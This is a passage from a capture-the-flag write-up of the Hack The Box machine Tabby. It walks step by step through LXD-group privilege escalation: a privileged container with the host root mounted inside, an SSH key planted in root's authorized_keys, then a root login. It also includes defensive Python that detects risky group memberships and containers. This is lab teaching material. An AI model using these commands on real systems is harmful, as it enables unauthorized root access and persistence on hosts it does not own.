Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
The image is imported.
ash@tabby:~$ lxc image import alpine-v3.12-x86_64-20210108_0403.tar.gz --alias alpine
Image imported with fingerprint: d82031be94ba1f4830d2742be85eec32b13506f8346ca43d0502cef26562b214
ash@tabby:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC | DESCRIPTION                   | ARCHITECTURE | TYPE      | SIZE   | UPLOAD DATE                 |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+
| alpine | d82031be94ba | no     | alpine v3.12 (20210108_04:03) | x86_64       | CONTAINER | 3.02MB | Jan 8, 2021 at 9:27am (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-----------------------------+
Create a privileged container from our image.
ash@tabby:~$ lxc init alpine privesc -c security.privileged=true
Creating privesc
Mount the host root file system inside the container.
ash@tabby:~$ lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
Device giveMeRoot added to privesc
Start container
ash@tabby:~$ lxc start privesc
ash@tabby:~$ lxc list
+---------+---------+--------------------+-----------------------------------------------+-----------+-----------+
| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
+---------+---------+--------------------+-----------------------------------------------+-----------+-----------+
| privesc | RUNNING | 10.200.98.3 (eth0) | fd42:637d:ff1d:836d:216:3eff:fe6a:a11d (eth0) | CONTAINER | 0 |
+---------+---------+--------------------+-----------------------------------------------+-----------+-----------+
Access a shell inside the container. We are root in the container (not the host machine).
ash@tabby:~$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
Inside the container, the host root file system is mounted at /mnt/root/.
~ # df -h
Filesystem                Size      Used Available Use% Mounted on
/dev/sda2                15.7G      5.4G      9.5G  36% /
none                    492.0K      4.0K    488.0K   1% /dev
udev                    951.2M         0    951.2M   0% /dev/fuse
udev                    951.2M         0    951.2M   0% /dev/net/tun
tmpfs                   100.0K         0    100.0K   0% /dev/lxd
/dev/sda2                15.7G      5.4G      9.5G  36% /mnt/root
tmpfs                   198.8M      1.1M    197.6M   1% /mnt/root/run
tmpfs                     5.0M         0      5.0M   0% /mnt/root/run/lock
tmpfs                   198.8M      1.1M    197.6M   1% /mnt/root/run/snapd/ns
tmpfs                   198.8M         0    198.8M   0% /mnt/root/run/user/1000
/dev/loop0               55.0M     55.0M         0 100% /mnt/root/snap/core18/1705
/dev/loop1               27.1M     27.1M         0 100% /mnt/root/snap/snapd/7264
/dev/loop2               69.0M     69.0M         0 100% /mnt/root/snap/lxd/14804
tmpfs                     1.0M         0      1.0M   0% /mnt/root/var/snap/lxd/common/ns
udev                    951.2M         0    951.2M   0% /mnt/root/dev
tmpfs                   100.0K         0    100.0K   0% /dev/.lxd-mounts
none                    492.0K      4.0K    488.0K   1% /proc/sys/kernel/random/boot_id
tmpfs                   198.8M     36.0K    198.7M   0% /run
We add our ssh public key to the user root.
~ # cd /mnt/root/root/.ssh/
/mnt/root/root/.ssh # echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCzD5s0m0O3c3au6Xs9P+HS7AxrYShHdJgdW64KoR09KbPdxfQLjwSkg7xv/m2c++FrEvL036xVY7MS/2kk+EtCrRH+BapfqQZUeLz7KsiXGmvI6cRs4dkMjPPGFsqXsiEQ7vCAA+1pXV/WgQO62FANn2bqUQq9NBa85FdGOSLdbk7siCi7KzcCnHl4sWDtmP9707S0NKyAAGcGEyukOAcGmbocl+9wxkVMxfY/50IHnQKTNrbmg0biWJEd8IPiLoRVHlI8ZRh76ggbOjuh9rnQOG7aIMq7LxEEjfTZmXuXgwObqYtWRzRh6u0OIBedKwEHXJvxNtZaUqb9csdK/vyGrylwF+oUmoL/2VHlUofDip7JK/Nzqk9J1LEzAU22hywRJ95fA36q9KNEDm6xtsrCJczMZb/bZkcEnkqLR5UgsJPKusSGf/3fZIeIGhWNsWxuUJfB9NBWkWpqaCbjkVP+9zcfLB1MOA8EFKS5JlUJiJ0Za/7KqC/LMBbAIpDdBW8= u505@naos' >> authorized_keys
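As an added example that is not part of the writeup, the Python below gives the two checks a defender would run for this escalation path: which users sit in groups that amount to root (lxd among them), and whether any LXD instance is privileged or has a host path attached as a disk, the exact combination built above. The /etc/group text and the lxc list --format json output are constructed to match what Tabby shows.

```python
"""Added example, not from the writeup: two checks a defender can run for the
lxd escalation path used above.  The /etc/group text and the ``lxc list
--format json`` output are constructed to match the shapes seen on Tabby."""
import json
from typing import Dict, List, Tuple

# Membership in any of these is effectively root on a default Ubuntu host.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "disk"}

# Constructed /etc/group excerpt using the gids seen in the id output above.
SAMPLE_ETC_GROUP = """root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
plugdev:x:46:ash
lxd:x:116:ash
ash:x:1000:
"""

# Constructed from the per-instance fields ``lxc list --format json`` prints.
SAMPLE_LXC_LIST = json.dumps([
    {"name": "web", "status": "Running",
     "expanded_config": {"image.os": "alpine"},
     "expanded_devices": {"root": {"path": "/", "pool": "default", "type": "disk"}}},
    {"name": "privesc", "status": "Running",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "root": {"path": "/", "pool": "default", "type": "disk"},
         "giveMeRoot": {"path": "/mnt/root", "source": "/",
                        "recursive": "true", "type": "disk"}}},
])


def root_equivalent_members(etc_group: str) -> Dict[str, List[str]]:
    """Map each user to the root-equivalent groups that list them."""
    result: Dict[str, List[str]] = {}
    for line in etc_group.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, _gid, members = (line.split(":") + ["", "", "", ""])[:4]
        if name not in ROOT_EQUIVALENT_GROUPS:
            continue
        for user in filter(None, members.split(",")):
            result.setdefault(user, []).append(name)
    return {u: sorted(g) for u, g in result.items()}


def find_host_escape_containers(lxc_list_json: str) -> List[dict]:
    """Instances that are privileged and/or pass a host path in as a disk.
    Privileged plus source=/ is the pattern used on Tabby."""
    findings = []
    for inst in json.loads(lxc_list_json):
        cfg = inst.get("expanded_config") or inst.get("config") or {}
        devs = inst.get("expanded_devices") or inst.get("devices") or {}
        privileged = str(cfg.get("security.privileged", "false")).lower() == "true"
        # Pool-backed root disks carry no ``source``; a host passthrough does.
        host_disks: List[Tuple[str, str]] = sorted(
            (n, d["source"]) for n, d in devs.items()
            if d.get("type") == "disk" and str(d.get("source", "")).startswith("/")
        )
        if privileged or host_disks:
            findings.append({
                "name": inst["name"],
                "privileged": privileged,
                "devices": host_disks,
                "severity": "critical" if privileged and host_disks else "warning",
            })
    return findings
```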
Root flag
u505@naos:~/HTB/Machines/Tabby$ ssh -i u505 root@tabby
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
System information as of Fri 08 Jan 2021 10:17:56 AM UTC
  System load:             0.0
  Usage of /:              34.4% of 15.68GB
  Memory usage:            29%
  Swap usage:              0%
  Processes:               190
  Users logged in:         1
  IPv4 address for ens192: 10.10.10.194
  IPv4 address for lxdbr0: 10.200.98.1
  IPv6 address for lxdbr0: fd42:637d:ff1d:836d::1
* MicroK8s gets a native Windows installer and command-line integration.
https://ubuntu.com/blog/microk8s-installers-windows-and-macos
0 updates can be installed immediately. 0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jun 17 21:58:30 2020 from 10.10.14.2
root@tabby:~# cat root.txt <ROOT_FLAG>
References
- Apache Tomcat auto WAR deployment & pwning penetration testing tool
- https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html#Deploy_A_New_Application_Archive_(WAR)_Remotely
- MSFVenom Cheatsheet
- https://stackoverflow.com/questions/5143915/test-file-upload-using-http-put-method
- https://www.hackingarticles.in/lxd-privilege-escalation/
Daniel Simao 05:13, 8 January 2021 (EST)